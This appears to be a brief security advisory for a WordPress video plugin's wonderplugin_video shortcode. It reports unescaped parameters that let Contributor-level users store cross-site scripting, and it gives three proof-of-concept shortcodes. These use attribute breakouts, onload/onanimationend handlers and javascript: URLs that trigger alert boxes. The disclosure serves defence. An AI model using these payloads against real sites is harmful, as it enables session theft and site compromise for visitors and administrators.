The plugin does not escape parameters of its wonderplugin_video shortcode, which could allow users with a role as low as Contributor to perform Stored XSS attacks.
[wonderplugin_video iframe='youtube.com?v=dQw4w9WgXcQ" onload="alert(1)' videocss='animation-name:twentytwentyone-close-button-transition" onanimationend="alert(2)']
[wonderplugin_video iframe="javascript:alert('wistia')"]
[wonderplugin_video videotype="mp4" lightbox="a" mp4="javascript:alert(3)" videowidth="100" videoheight="100" webm='" style="animation-name:twentytwentyone-close-button-transition;display:block;width:100px;height:100px;" onanimationend="alert(4)']